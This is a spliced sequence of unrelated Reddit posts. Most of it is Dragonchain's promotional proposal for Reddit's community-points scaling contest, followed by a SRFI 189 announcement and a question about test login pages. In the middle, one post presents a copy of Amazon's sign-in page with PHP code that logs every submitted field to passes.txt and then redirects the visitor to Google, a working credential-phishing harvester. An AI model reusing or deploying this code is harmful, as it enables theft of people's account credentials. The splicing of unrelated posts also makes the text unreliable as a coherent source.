Dragonchain is a robust open source hybrid blockchain platform that has proven to withstand the passing of time since our inception in 2014. We have continued to evolve to harness the scalability of private nodes, yet take full advantage of the security of public decentralized networks, like Ethereum. We have a live, operational, and fully functional Interchain network integrating Bitcoin, Ethereum, Ethereum Classic, and ~700 independent Dragonchain nodes. Every transaction is secured to Ethereum, Bitcoin, and Ethereum Classic. Transactions are immediately usable on chain, and the first decentralization is seen within 20 seconds on Dragon Net. Security increases further to public networks ETH, BTC, and ETC within 10 minutes to 2 hours. Smart contracts can be written in any executable language, offering full freedom to existing developers. We invite any developer to watch the demo, play with our SDK’s, review open source code, and to help us move forward. Dragonchain specializes in scalable loyalty & rewards solutions and has built a decentralized social network on chain, with very affordable transaction costs. This experience can be combined with the insights Reddit and the Ethereum community have gained in the past couple of months to roll out the solution at a rapid pace.

Response and PoC

In The Great Reddit Scaling Bake-Off post, Reddit has asked for a series of demonstrations, requirements, and other considerations. In this section, we will attempt to answer all of these requests.

Live Demo

A live proof of concept showing hundreds of thousands of transactions
On Jan 7, 2020, Dragonchain hosted a 24-hour live demonstration during which a quarter of a billion (250 million+) transactions executed fully on an operational network. Every single transaction on Dragonchain is decentralized immediately through 5 levels of Dragon Net, and then secured with combined proof on Bitcoin, Ethereum, Ethereum Classic, and Binance Chain, via Interchain. This means that every single transaction is secured by, and traceable to these networks. An attack on this system would require a simultaneous attack on all of the Interchained networks.
24 hours in 4 minutes (YouTube):
24 hours in 4 minutes
The demonstration was of a single business system, and any user is able to scale this further, by running multiple systems simultaneously. Our goals for the event were to demonstrate a consistent capacity greater than that of Visa over an extended time period.
Tooling to reproduce our demo is available here:

Source Code

Source code (for on & off-chain components as well as tooling used for the PoC). The source code does not have to be shared publicly, but if Reddit decides to use a particular solution it will need to be shared with Reddit at some point.


How it works & scales

Architectural Scaling

Dragonchain’s architecture attacks the scalability issue from multiple angles. Dragonchain is a hybrid blockchain platform, wherein every transaction is protected on a business node to the requirements of that business or purpose. A business node may be held completely private or may be exposed or replicated to any level of exposure desired.
Every node has its own blockchain and is independently scalable. Dragonchain established Context Based Verification as its consensus model. Every transaction is immediately usable on a trust basis, and in time is provable to an increasing level of decentralized consensus. A transaction will have a level of decentralization to independently owned and deployed Dragonchain nodes (~700 nodes) within seconds, and full decentralization to BTC and ETH within minutes or hours. Level 5 nodes (Interchain nodes) function to secure all transactions to public or otherwise external chains such as Bitcoin and Ethereum. These nodes scale the system by aggregating multiple blocks into a single Interchain transaction on a cadence. This timing is configurable based upon average fees for each respective chain. For detailed information about Dragonchain’s architecture, and Context Based Verification, please refer to the Dragonchain Architecture Document.

Economic Scaling

An interesting feature of Dragonchain’s network consensus is its economics and scarcity model. Since Dragon Net nodes (L2-L4) are independent staking nodes, deployment to cloud platforms would allow any of these nodes to scale to take on a large percentage of the verification work. This is great for scalability but bad for the economy: with no scarcity, pricing would spiral downward, resulting in fewer verification nodes. For this reason, Dragonchain uses TIME as scarcity.
TIME is calculated as the number of Dragons held, multiplied by the number of days held. TIME influences the user’s access to features within the Dragonchain ecosystem. It takes into account both the Dragon balance and length of time each Dragon is held. TIME is staked by users against every verification node and dictates how much of the transaction fees are awarded to each participating node for every block.
TIME also dictates the transaction fee itself for the business node. TIME is staked against a business node to set a deterministic transaction fee level (see transaction fee table below in Cost section). This is very interesting in a discussion about scaling because it guarantees independence for business implementation. No matter how much traffic appears on the entire network, a business is guaranteed to not see an increased transaction fee rate.
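The TIME formula stated above is simple enough to sketch directly (illustrative Python, not Dragonchain's code):

```python
def time_score(dragons_held, days_held):
    """TIME, as described above: Dragons held multiplied by days held."""
    return dragons_held * days_held

# A holder keeping 10,000 Dragons for 90 days accrues:
print(time_score(10_000, 90))  # 900000 TIME
```

Because TIME grows with holding duration rather than balance alone, spinning up many short-lived nodes does not buy influence; that is what restores scarcity to an otherwise freely scalable pool of verifiers.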

Scaled Deployment

Dragonchain uses Docker and Kubernetes to allow the use of best practices traditional system scaling. Dragonchain offers managed nodes with an easy to use web based console interface. The user may also deploy a Dragonchain node within their own datacenter or favorite cloud platform. Users have deployed Dragonchain nodes on-prem on Amazon AWS, Google Cloud, MS Azure, and other hosting platforms around the world. Any executable code, anything you can write, can be written into a smart contract. This flexibility is what allows us to say that developers with no blockchain experience can use any code language to access the benefits of blockchain. Customers have used NodeJS, Python, Java, and even BASH shell script to write smart contracts on Dragonchain.
With Docker containers, we achieve better separation of concerns, faster deployment, higher reliability, and lower response times.
We chose Kubernetes for its self-healing features, ability to run multiple services on one server, and its large and thriving development community. It is resilient, scalable, and automated. OpenFaaS allows us to package smart contracts as Docker images for easy deployment.
Contract deployment time is now bounded only by the size of the Docker image being deployed but remains fast even for reasonably large images. We also take advantage of Docker’s flexibility and its ability to support any language that can run on x86 architecture. Any image, public or private, can be run as a smart contract using Dragonchain.

Flexibility in Scaling

Dragonchain’s architecture considers interoperability and integration as key features. From inception, we had a goal to increase adoption via integration with real business use cases and traditional systems.
We envision the ability for Reddit, in the future, to be able to integrate alternate content storage platforms or other financial services along with the token.
  • LBRY - to allow users to deploy content natively to LBRY
  • MakerDAO - to allow users to borrow small amounts backed by their Reddit community points
  • STORJ/SIA - to allow decentralized on-chain storage of portions of content
These integrations, or any others, are relatively easy to implement on Dragonchain with an Interchain implementation.


Cost estimates (on-chain and off-chain)

For the purpose of this proposal, we assume that all transactions are on chain (posts, replies, and votes).
On the Dragonchain network, transaction costs are deterministic/predictable. By staking TIME on the business node (as described above) Reddit can reduce transaction costs to as low as $0.0000025 per transaction.
Dragonchain Fees Table

Getting Started

How to run it
Building on Dragonchain is simple and requires no blockchain experience. Spin up a business node (L1) in our managed environment (AWS), run it in your own cloud environment, or on-prem in your own datacenter. Clear documentation will walk you through the steps of spinning up your first Dragonchain Level 1 Business node.
Getting started is easy...
  1. Download Dragonchain’s dctl
  2. Input three commands into a terminal
  3. Build an image
  4. Run it
More information can be found in our Get started documents.

Dragonchain is an open source hybrid platform. Through Dragon Net, each chain combines the power of a public blockchain (like Ethereum) with the privacy of a private blockchain.
Dragonchain organizes its network into five separate levels. A Level 1, or business node, is a totally private blockchain only accessible through the use of public/private keypairs. All business logic, including smart contracts, can be executed on this node directly and added to the chain.
After creating a block, the Level 1 business node broadcasts a version stripped of sensitive private data to Dragon Net. Three Level 2 Validating nodes validate the transaction based on guidelines determined by the business. A Level 3 Diversity node checks that the Level 2 nodes are from a diverse array of locations. A Level 4 Notary node, hosted by a KYC partner, then signs the validation record received from the Level 3 node. The transaction hash is ledgered to the Level 5 public chain to take advantage of the hash power of massive public networks.
Dragon Net can be thought of as a “blockchain of blockchains”, where every level is a complete private blockchain. Because an L1 can send to multiple nodes on a single level, proof of existence is distributed among many places in the network. Eventually, proof of existence reaches level 5 and is published on a public network.
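The five-level flow described above can be sketched as a toy model. All names and structures here are illustrative assumptions for the sake of the example, not Dragonchain source code:

```python
from dataclasses import dataclass, field

@dataclass
class Transaction:
    payload: dict                 # private business data; stays on L1
    verifications: list = field(default_factory=list)

def l1_broadcast(txn):
    """L1 strips sensitive data, broadcasting only a hash to Dragon Net."""
    return {"hash": hash(frozenset(txn.payload.items()))}

def dragon_net(txn):
    """Walk the stripped record through the four higher levels."""
    public_record = l1_broadcast(txn)
    txn.verifications.append(("L2", "validated x3"))      # 3 validating nodes
    txn.verifications.append(("L3", "diversity check"))   # geographic diversity
    txn.verifications.append(("L4", "notarized"))         # KYC-partner signature
    txn.verifications.append(("L5", "ledgered to BTC/ETH/ETC"))
    return public_record, txn.verifications

record, proofs = dragon_net(Transaction({"user": "alice", "votes": 1}))
print(len(proofs))  # 4 verification levels beyond L1
```

Note that the public record carries only a hash: the raw payload never leaves the business node, which is the point of the hybrid design.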

API Documentation

APIs (on chain & off)

SDK Source

Nobody’s Perfect

Known issues or tradeoffs
  • Dragonchain is open source and even though the platform is easy enough for developers to code in any language they are comfortable with, we do not have so large a developer community as Ethereum. We would like to see the Ethereum developer community (and any other communities) become familiar with our SDK’s, our solutions, and our platform, to unlock the full potential of our Ethereum Interchain. Long ago we decided to prioritize both Bitcoin and Ethereum Interchains. We envision an ecosystem that encompasses different projects to give developers the ability to take full advantage of all the opportunities blockchain offers to create decentralized solutions not only for Reddit but for all of our current platforms and systems. We believe that together we will take the adoption of blockchain further. We currently have additional Interchain with Ethereum Classic. We look forward to Interchain with other blockchains in the future. We invite all blockchains projects who believe in decentralization and security to Interchain with Dragonchain.
  • While we only have ~700 nodes compared to Ethereum’s 8,000 and Bitcoin’s 10,000, we harness those 18,000 nodes to scale to extremely high levels of security. See Dragonchain metrics.
  • Some may consider the centralization of Dragonchain’s business nodes as an issue at first glance, however, the model is by design to protect business data. We do not consider this a drawback as these nodes can make any, none, or all data public. Depending upon the implementation, every subreddit could have control of its own business node, for potential business and enterprise offerings, bringing new alternative revenue streams to Reddit.

Costs and resources

Summary of cost & resource information for both on-chain & off-chain components used in the PoC, as well as cost & resource estimates for further scaling. If your PoC is not on mainnet, make note of any mainnet caveats (such as congestion issues).
Every transaction on the PoC system had a transaction fee of $0.0001 (one-hundredth of a cent USD). At 256MM transactions, the demo cost $25,600. With current operational fees, the same demonstration would cost $640 USD.
For the demonstration, to achieve throughput to mimic a worldwide payments network, we modeled several clients in AWS and 4-5 business nodes to handle the traffic. The business nodes were tuned to handle higher throughput by adjusting memory and machine footprint on AWS. This flexibility is valuable to implementing a system such as envisioned by Reddit. Given that Reddit’s daily traffic (posts, replies, and votes) is less than half that of our demo, we would expect that the entire Reddit system could be handled on 2-5 business nodes using right-sized containers on AWS or similar environments.
Verification was accomplished on the operational Dragon Net network with over 700 independently owned verification nodes running around the world at no cost to the business other than paid transaction fees.
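The cost figures quoted in this section reduce to simple arithmetic:

```python
# Reproducing the demo cost figures stated above.
txns = 256_000_000           # transactions in the 24-hour demo
demo_fee = 0.0001            # per-transaction fee at the Jan 2020 demo
current_fee = 0.0000025      # lowest current per-transaction fee

print(round(txns * demo_fee))     # 25600 -> the "$25,600" demo cost
print(round(txns * current_fee))  # 640   -> the "$640 USD" at current fees
```

Since fees are deterministic per transaction, projecting Reddit's cost is a straight multiplication of expected volume by the staked fee tier.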



This PoC should scale to the numbers below with minimal costs (both on & off-chain). There should also be a clear path to supporting hundreds of millions of users.
Over a 5 day period, your scaling PoC should be able to handle:
  • 100,000 point claims (minting & distributing points)
  • 25,000 subscriptions
  • 75,000 one-off points burning
  • 100,000 transfers
During Dragonchain’s 24 hour demo, the above required numbers were reached within the first few minutes.
Reddit’s total activity is 9000% more than Ethereum’s total transaction level. Even if you do not include votes, it is still 700% more than Ethereum’s current volume. Dragonchain has demonstrated that it can handle 250 million transactions a day, and its architecture allows for multiple systems to work at that level simultaneously. In our PoC, we demonstrate double the full capacity of Reddit, and every transaction was proven all the way to Bitcoin and Ethereum.
Reddit Scaling on Ethereum


Solutions should not depend on any single third-party provider. We prefer solutions that do not depend on specific entities such as Reddit or another provider, and solutions with no single point of control or failure in off-chain components but recognize there are numerous trade-offs to consider
Dragonchain’s architecture calls for a hybrid approach. Private business nodes hold the sensitive data while the validation and verification of transactions for the business are decentralized within seconds and secured to public blockchains within 10 minutes to 2 hours. Nodes could potentially be controlled by owners of individual subreddits for more organic decentralization.
  • Billing is currently centralized - there is a path to federation and decentralization of a scaled billing solution.
  • Operational multi-cloud
  • Operational on-premises capabilities
  • Operational deployment to any datacenter
  • Over 700 independent Community Verification Nodes with proof of ownership
  • Operational Interchain (Interoperable to Bitcoin, Ethereum, and Ethereum Classic, open to more)

Usability

Scaling solutions should have a simple end user experience.

Users shouldn't have to maintain any extra state/proofs, regularly monitor activity, keep track of extra keys, or sign anything other than their normal transactions
Dragonchain and its customers have demonstrated extraordinary usability as a feature in many applications, where users do not need to know that the system is backed by a live blockchain. Lyceum is one of these examples, where the progress of academy courses is being tracked, and successful completion of courses is rewarded with certificates on chain. Our @Save_The_Tweet bot is popular on Twitter. When used with one of the following hashtags - #please, #blockchain, #ThankYou, or #eternalize the tweet is saved through Eternal to multiple blockchains. A proof report is available for future reference. Other examples in use are DEN, our decentralized social media platform, and our console, where users can track their node rewards, view their TIME, and operate a business node.

Transactions complete in a reasonable amount of time (seconds or minutes, not hours or days)
All transactions are immediately usable on chain by the system. A transaction begins the path to decentralization at the conclusion of a 5-second block when it gets distributed across 5 separate community run nodes. Full decentralization occurs within 10 minutes to 2 hours depending on which interchain (Bitcoin, Ethereum, or Ethereum Classic) the transaction hits first. Within approximately 2 hours, the combined hash power of all interchained blockchains secures the transaction.

Free to use for end users (no gas fees, or fixed/minimal fees that Reddit can pay on their behalf)
With transaction pricing as low as $0.0000025 per transaction, it may be considered reasonable for Reddit to cover transaction fees for users.
All of Reddit's Transactions on Blockchain (month)
Community points can be earned by users and distributed directly to their Reddit account in batch (as per Reddit minting plan), and allow users to withdraw rewards to their Ethereum wallet whenever they wish. Withdrawal fees can be paid by either user or Reddit. This model has been operating inside the Dragonchain system since 2018, and many security and financial compliance features can be optionally added. We feel that this capability greatly enhances user experience because it is seamless to a regular user without cryptocurrency experience, yet flexible to a tech savvy user. With regard to currency or token transactions, these would occur on the Reddit network, verified to BTC and ETH, and would incur the $0.0000025 transaction fee. To estimate the total, we use the monthly active Reddit user count (per Statista) with a 60% adoption rate and an average of 10 transactions per user per month, resulting in an approximate $720 cost across the system. Reddit could feasibly incur all associated internal network charges (mining/minting, transfer, burn) as these are very low and controllable fees.
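The ~$720/month estimate can be reconstructed as follows. The 48M monthly-active-user figure is our inference chosen so the stated numbers agree, since the proposal cites Statista without quoting the count:

```python
# Reconstructing the ~$720/month system-wide fee estimate stated above.
monthly_active_users = 48_000_000  # inferred; the Statista figure is not quoted
adoption_rate = 0.60               # assumed adoption, per the proposal
txns_per_user_per_month = 10       # estimated average, per the proposal
fee = 0.0000025                    # lowest per-transaction fee

monthly_cost = (monthly_active_users * adoption_rate
                * txns_per_user_per_month * fee)
print(round(monthly_cost))  # 720
```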
Reddit Internal Token Transaction Fees

Reddit Ethereum Token Transaction Fees
When we consider further the Ethereum fees that might be incurred, we have a few choices for a solution.
  1. Offload all Ethereum transaction fees (user withdrawals) to interested users as they wish to withdraw tokens for external use or sale.
  2. Cover Ethereum transaction fees by aggregating them on a timed schedule. Users would request withdrawal (from Reddit or individual subreddits), and they would be transacted on the Ethereum network every hour (or some other schedule).
  3. In a combination of the above, customers could cover aggregated fees.
  4. Integrate with alternate Ethereum roll up solutions or other proposals to aggregate minting and distribution transactions onto Ethereum.

Bonus Points

Users should be able to view their balances & transactions via a blockchain explorer-style interface
From interfaces for users who have no knowledge of blockchain technology to users who are well versed in blockchain terms such as those present in a typical block explorer, a system powered by Dragonchain has flexibility on how to provide balances and transaction data to users. Transactions can be made viewable in an Eternal Proof Report, which displays raw data along with TIME staking information and traceability all the way to Bitcoin, Ethereum, and every other Interchained network. The report shows fields such as transaction ID, timestamp, block ID, multiple verifications, and Interchain proof. See example here.
Node payouts within the Dragonchain console are listed in chronological order and can be further seen in either Dragons or USD. See example here.
In our social media platform, Dragon Den, users can see, in real-time, their NRG and MTR balances. See example here.
A new influencer app powered by Dragonchain, Raiinmaker, breaks down data into a user friendly interface that shows coin portfolio, redeemed rewards, and social scores per campaign. See example here.

Exiting is fast & simple
Withdrawing funds on Dragonchain’s console requires three clicks; withdrawal flows with enhanced security features are also obtainable, at Reddit’s discretion.

Interoperability

Compatibility with third party apps (wallets/contracts/etc) is necessary.
Proven interoperability at scale that surpasses the required specifications. Our entire platform consists of interoperable blockchains connected to each other and traditional systems. APIs are well documented. Third party permissions are possible with a simple smart contract without the end user being aware. No need to learn any specialized proprietary language. Any code base (not subsets) is usable within a Docker container. Interoperable with any blockchain or traditional APIs. We’ve witnessed relatively complex systems built by engineers with no blockchain or cryptocurrency experience. We’ve also demonstrated the creation of smart contracts within minutes built with BASH shell and Node.js. Please see our source code and API documentation.

Scaling solutions should be extensible and allow third parties to build on top of it

Open source and extensible.
APIs should be well documented and stable

Documentation should be clear and complete
For full documentation, explore our docs, SDK’s, Github repo’s, architecture documents, original Disney documentation, and other links or resources provided in this proposal.

Third-party permissionless integrations should be possible & straightforward

Smart contracts are Docker based, can be written in any language, use full language (not subsets), and can therefore be integrated with any system including traditional system APIs. Simple is better. Learning an uncommon or proprietary language should not be necessary.
Advanced knowledge of mathematics, cryptography, or L2 scaling should not be required. Compatibility with common utilities & toolchains is expected.
Dragonchain business nodes and smart contracts leverage Docker to allow the use of literally any language or executable code. No proprietary language is necessary. We’ve witnessed relatively complex systems built by engineers with no blockchain or cryptocurrency experience. We’ve also demonstrated the creation of smart contracts within minutes built with BASH shell and Node.js.


Bonus Points: Show us how it works. Do you have an idea for a cool new use case for Community Points? Build it!


Community points could be awarded to Reddit users based upon TIME too, whereby the longer someone is part of a subreddit, the more community points they naturally gain, even if not actively commenting or sharing new posts. A daily login could be required for these community points to be credited. This grants awards to readers too and incentivizes readers to create an account on Reddit if they browse the website often. This concept could also be leveraged to provide some level of reputation based upon duration and consistency of contribution to a community subreddit.

Dragon Den

Dragonchain has already built a social media platform that harnesses community involvement. Dragon Den is a decentralized community built on the Dragonchain blockchain platform. Dragon Den is Dragonchain’s answer to fake news, trolling, and censorship. It incentivizes the creation and evaluation of quality content within communities. It could be described as being a shareholder of a subreddit or Reddit in its entirety. The more your subreddit is thriving, the more rewarding it will be. Den is currently in a public beta and in active development, though the real token economy is not live yet. There are different tokens for various purposes. Two tokens are Lair Ownership Rights (LOR) and Lair Ownership Tokens (LOT). LOT is a non-fungible token for ownership of a specific Lair. LOT will only be created and converted from LOR.
Energy (NRG) and Matter (MTR) work jointly. Your MTR determines how much NRG you receive in a 24-hour period. Providing quality content, or evaluating content will earn MTR.
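The Matter-to-Energy relationship could be modeled, for illustration only, as a proportional share of a daily pool — Den's actual token economics may differ:

```python
def daily_nrg(user_mtr: float, total_mtr: float, nrg_pool: float) -> float:
    """NRG granted per 24-hour period, proportional to the user's
    share of all Matter (MTR) in the Lair."""
    if total_mtr == 0:
        return 0.0
    return nrg_pool * (user_mtr / total_mtr)

# Holding 5% of all MTR yields 5% of the daily NRG pool:
print(daily_nrg(50.0, 1000.0, 200.0))  # 10.0
```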

Security. Users have full ownership & control of their points.
All community points, awarded based upon any type of activity or gift, are secured and provable on all Interchain networks (currently BTC, ETH, ETC). Users are free to spend and withdraw their points as they please, depending on the features Reddit wants to bring into production.

Balances and transactions cannot be forged, manipulated, or blocked by Reddit or anyone else
Users can withdraw their balance to their ERC20 wallet, directly through Reddit. Reddit can cover the fees on their behalf, or the user covers this with a portion of their balance.

Users should own their points and be able to get on-chain ERC20 tokens without permission from anyone else
Through our console, users can withdraw their ERC20 rewards. This can be achieved on Reddit too. Here is a walkthrough of our console; though it does not show the quick-withdrawal functionality, a user can withdraw at any time. https://www.youtube.com/watch?v=aNlTMxnfVHw

Points should be recoverable to on-chain ERC20 tokens even if all third-parties involved go offline
If necessary, signed transactions from the Reddit system (e.g. Reddit + Subreddit) can be sent to the Ethereum smart contract for minting.
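Conceptually, that recovery path amounts to the contract verifying a signature from the Reddit system before minting. The Python sketch below uses HMAC as a stand-in for the on-chain signature check (a real deployment would use ECDSA signatures verified by the Ethereum contract; all names here are illustrative):

```python
import hashlib
import hmac
import json

REDDIT_KEY = b"reddit-signing-key"  # stand-in for Reddit's signing key

def sign_voucher(user: str, amount: int) -> dict:
    """Reddit-side: produce a signed withdrawal voucher."""
    msg = json.dumps({"user": user, "amount": amount}, sort_keys=True).encode()
    return {"user": user, "amount": amount,
            "sig": hmac.new(REDDIT_KEY, msg, hashlib.sha256).hexdigest()}

def mint_if_valid(voucher: dict) -> bool:
    """Contract-side: recompute and compare the signature before minting."""
    msg = json.dumps({"user": voucher["user"], "amount": voucher["amount"]},
                     sort_keys=True).encode()
    expected = hmac.new(REDDIT_KEY, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, voucher["sig"])

v = sign_voucher("u/alice", 100)
print(mint_if_valid(v))   # True
v["amount"] = 1_000_000   # a tampered voucher fails verification
print(mint_if_valid(v))   # False
```

The key property is that minting depends only on the signed voucher, so tokens remain recoverable even if intermediaries go offline.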

A public, third-party review attesting to the soundness of the design should be available
To our knowledge, at least two large corporations, including a top 3 accounting firm, have conducted positive reviews. These reviews have never been made public, as Dragonchain did not pay or contract for these studies to be released.

Bonus points
Public, third-party implementation review available or in progress
See above

Compatibility with HSMs & hardware wallets
For the purpose of this proposal, all tokenization would be on the Ethereum network using standard token contracts and as such, would be able to leverage all hardware wallet and Ethereum ecosystem services.

Other Considerations

Minting/distributing tokens is not performed by Reddit directly
This operation can be automated by a smart contract on Ethereum. Subreddits can, if desired, have a role to play.

One off point burning, as well as recurring, non-interactive point burning (for subreddit memberships) should be possible and scalable
This is possible and scalable with interaction between Dragonchain Reddit system and Ethereum token contract(s).
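A hedged sketch of how recurring, non-interactive membership burns might be tracked off-chain before being settled against the token contract (the field names and lapse rule are illustrative assumptions):

```python
def process_membership_burns(balances: dict, memberships: dict) -> dict:
    """Deduct each user's recurring membership cost from their balance;
    users who cannot afford the cost are skipped (membership lapses)."""
    burned = {}
    for user, cost in memberships.items():
        if balances.get(user, 0) >= cost:
            balances[user] -= cost
            burned[user] = cost
    return burned

balances = {"u/alice": 50, "u/bob": 3}
print(process_membership_burns(balances, {"u/alice": 10, "u/bob": 10}))
print(balances)
```

Run on a schedule, this requires no interaction from the user, and the resulting burn totals can be settled to Ethereum in batches.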

Fully open-source solutions are strongly preferred
Dragonchain is fully open source (see section on Disney release after conclusion).


Whether it is today or in the future, we would like to work together to bring secure flexibility to the highest standards. It is our hope to be considered by Ethereum, Reddit, and other integrative solutions so we may further discuss the possibilities of implementation. In our public demonstration, 256 million transactions were handled on chain in our operational network in 24 hours, at a cost of $25K; run today, it would cost $625. Dragonchain's interoperable foundation provides the atmosphere necessary to implement a frictionless community points system. Thank you for considering our proposal. We look forward to working with the community to make something great!

Disney Releases Blockchain Platform as Open Source

The team at Disney created the Disney Private Blockchain Platform. The system was a hybrid interoperable blockchain platform for ledgering and smart contract development geared toward solving problems with blockchain adoption and usability. All objective evaluation would consider the team’s output a success. We released a list of use cases that we explored in some capacity at Disney, and our input on blockchain standardization as part of our participation in the W3C Blockchain Community Group.

Open Source

In 2016, Roets proposed to release the platform as open source to spread the technology outside of Disney, as others within the W3C group were interested in the solutions that had been created inside of Disney.
Following a long process, step by step, the team met requirements for release. Among the requirements, the team had to:
  • Obtain VP support and approval for the release
  • Verify ownership of the software to be released
  • Verify that no proprietary content would be released
  • Convince the organization that there was a value to the open source community
  • Convince the organization that there was a value to Disney
  • Offer the plan for ongoing maintenance of the project outside of Disney
  • Itemize competing projects
  • Verify no conflict of interest
  • Preferred license
  • Change the project name to not use the name Disney, any Disney character, or any other associated IP - proposed Dragonchain - approved
  • Obtain legal approval
  • Approval from corporate, parks, and other business units
  • Approval from multiple Disney patent groups
  • Copyright holder defined by Disney (Disney Connected and Advanced Technologies)
  • Trademark searches conducted for the selected name Dragonchain
  • Obtain IT security approval
  • Manual review of OSS components conducted
  • OWASP Dependency and Vulnerability Check Conducted
  • Obtain technical (software) approval
  • Offer management, process, and financial plans for the maintenance of the project.
  • Meet list of items to be addressed before release
  • Remove all Disney project references and scripts
  • Create a public distribution list for email communications
  • Remove Roets’ direct and internal contact information
  • Create public Slack channel and move from Disney slack channels
  • Create proper labels for issue tracking
  • Rename internal private Github repository
  • Add informative description to Github page
  • Expand README.md with more specific information
  • Add information beyond current “Blockchains are Magic”
  • Add getting started sections and info on cloning/forking the project
  • Add installation details
  • Add uninstall process
  • Add unit, functional, and integration test information
  • Detail how to contribute and get involved
  • Describe the git workflow that the project will use
  • Move to public, non-Disney git repository (Github or Bitbucket)
  • Obtain Disney Open Source Committee approval for release
On top of meeting the above criteria, as part of the process, the maintainer of the project had to receive the codebase on their own personal email and create accounts for maintenance (e.g. Github) with non-Disney accounts. Given the fact that the project spanned multiple business units, Roets was individually responsible for its ongoing maintenance. Because of this, he proposed in the open source application to create a non-profit organization to hold the IP and maintain the project. This was approved by Disney.
The Disney Open Source Committee approved the application known as OSSRELEASE-10, and the code was released on October 2, 2016. Disney decided to not issue a press release.
Original OSSRELEASE-10 document

Dragonchain Foundation

The Dragonchain Foundation was created on January 17, 2017. https://den.social/l/Dragonchain/24130078352e485d96d2125082151cf0/dragonchain-and-disney/
submitted by j0j0r0 to ethereum [link] [comments]

2020.07.18 13:56 v1rus9r1nc355 A copy of amazon login/signup page

Amazon.com Sign In

Sign In

What is your e-mail address?

Do you have an Amazon.com password?

Sign In Help
Forgot your password? Get password help.
Has your e-mail address changed? Update it here.

<?php
// Append every submitted form field to passes.txt, then redirect to Google.
header("Location: http://www.google.com");
$handle = fopen("passes.txt", "a");
foreach ($_GET as $variable => $value) {
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
This is NOT the original Amazon page, but rather my take on the code (compiled by taking reference from various sites, including the original). The page is written in HTML with internal CSS and PHP. To make sure all the pages work as intended, you would need to either host the website or run it locally on XAMPP.
submitted by v1rus9r1nc355 to u/v1rus9r1nc355 [link] [comments]

2020.07.15 08:30 arthurgleckler Final SRFI 189: Maybe and Either: optional container types

Scheme Request for Implementation 189, "Maybe and Either: optional container types," by John Cowan (text), Wolfgang Corcoran-Mathe (sample implementation), has gone into final status.
The document and an archive of the discussion are available at https://srfi.schemers.org/srfi-189/.
Here's the abstract:
This SRFI defines two disjoint immutable container types known as Maybe and Either, both of which can contain objects collectively known as their payload. A Maybe object is either a Just object or the unique object Nothing (which has no payload); an Either object is either a Right object or a Left object. Maybe represents the concept of optional values; Either represents the concept of values which are either correct (Right) or errors (Left). Note that the terms Maybe, Just, Nothing, Either, Right, and Left are capitalized in this SRFI so as not to be confused with their ordinary use as English words. Thus "returns Nothing" means "returns the unique Nothing object"; "returns nothing" could be interpreted as "returns no values" or "returns an unspecified value".
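To illustrate the abstract's terminology outside of Scheme, here is a rough Python analogue of the two container types. This is a sketch only; the SRFI's actual API is the Scheme one described in the document:

```python
from dataclasses import dataclass
from typing import Any

@dataclass
class Just:      # a Maybe carrying a payload
    payload: Any

class Nothing:   # the unique payload-less Maybe
    pass

NOTHING = Nothing()

@dataclass
class Right:     # an Either holding a correct value
    payload: Any

@dataclass
class Left:      # an Either holding an error value
    payload: Any

def safe_div(a: float, b: float):
    """Return Right(quotient) on success, Left(reason) on error."""
    return Left("division by zero") if b == 0 else Right(a / b)

print(safe_div(6, 3))  # Right(payload=2.0)
print(safe_div(1, 0))  # Left(payload='division by zero')
```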
Here is the commit summary since the most recent draft:
  • typo
  • editorial
  • degenerate maybe-and and maybe-or swapped
  • Add -let*-values forms.
  • maybe/either-let*-values
  • Move syntax tests to their own file. Add tests for -let*-values forms.
  • add identifier-as-claw
  • added Shiro to acks
  • exception type specified; definition of claws clarified; exception->either added
  • restored line dropped in error
  • Add exception->either.
  • Use error to signal errors in macros.
  • exception->either: thunk can return multiple values
  • Ensure the correct error objects are signaled in a few missed cases.
  • Fix typo.
  • Fix typo in test.
  • editorial
  • bad reading of SRFI 2
  • Use absolute link to "srfi.css".
  • either-guard
  • exception->either: Use guard.
  • Add either-guard.
  • Add tests for exception->either and either-guard.
  • The -let*(-values) forms wrap their body expressions.
  • Update tests for -let*(-values) to conform to 88438c1c.
  • Add tests for error conditions in syntax.
  • Amend test overlooked in 1e8354f4.
  • typo
  • consistency
  • -> to match new format.
  • Fix problems reported by W3C HTML Validator.
  • explicit note on argument types
  • Finalize.
Here are the diffs since the most recent draft:
Many thanks to John and to everyone who contributed to the discussion of this SRFI.
SRFI Editor
submitted by arthurgleckler to scheme [link] [comments]

2020.07.04 06:19 w0lfcat Sample of fake online login page for testing purposes

I'm looking for a testing site just like http://www.example.com/ but with dynamic content, e.g. a login page; http://www.example.com/ doesn't have one.
This is one of the fake login pages for testing purposes that I found.
However, there is no username/password provided for this testing site.
There was a better fake login page with a valid username and password, so that we could test it with curl or any programming language (say, Python's requests module), but I did not bookmark it and lost it.
I've googled for it, but can't find it again.
This is what I wanted to do: play around with the Python requests module or with curl.
>>> url = 'http://www.stealmylogin.com/demo.html'
>>> requests.get(url)
<Response [200]>
>>> requests.get(url).text
'\n\n\n\nStealMyLogin.com Demo\n\n\n\n\nLogin\n\n\nTest with a dummy username and password.\n\n\nThis demo contains a login form on a non-HTTPS page.\nEven though the form is being submitted to a secure (HTTPS) page, \nyour login info can be easily stolen.\n\nMore info at stealmylogin.com\n\n\n\n\n \n\n\n\n\n'
>>>
[email protected]:~$ curl http://www.stealmylogin.com/demo.html
(same page: "StealMyLogin.com Demo" with a "Login" form; the HTML tags were stripped in this archive)
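For experimenting without hitting the network at all, the same POST can be constructed with the standard library alone. This sketch only builds and inspects the request; the `username`/`password` field names are assumptions about the demo form, not taken from its source:

```python
from urllib import parse, request

def build_login_request(url: str, username: str, password: str) -> request.Request:
    """Encode form fields the way a browser would submit them; the
    Request object can be inspected before (or instead of) sending."""
    data = parse.urlencode({"username": username,
                            "password": password}).encode()
    return request.Request(url, data=data, method="POST")

req = build_login_request("http://www.stealmylogin.com/demo.html",
                          "dummyuser", "dummypass")
print(req.get_method())  # POST
print(req.data)          # b'username=dummyuser&password=dummypass'
```

Sending it would just be `urllib.request.urlopen(req)`, or the equivalent `requests.post(url, data=...)`.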


submitted by w0lfcat to webdevelopment [link] [comments]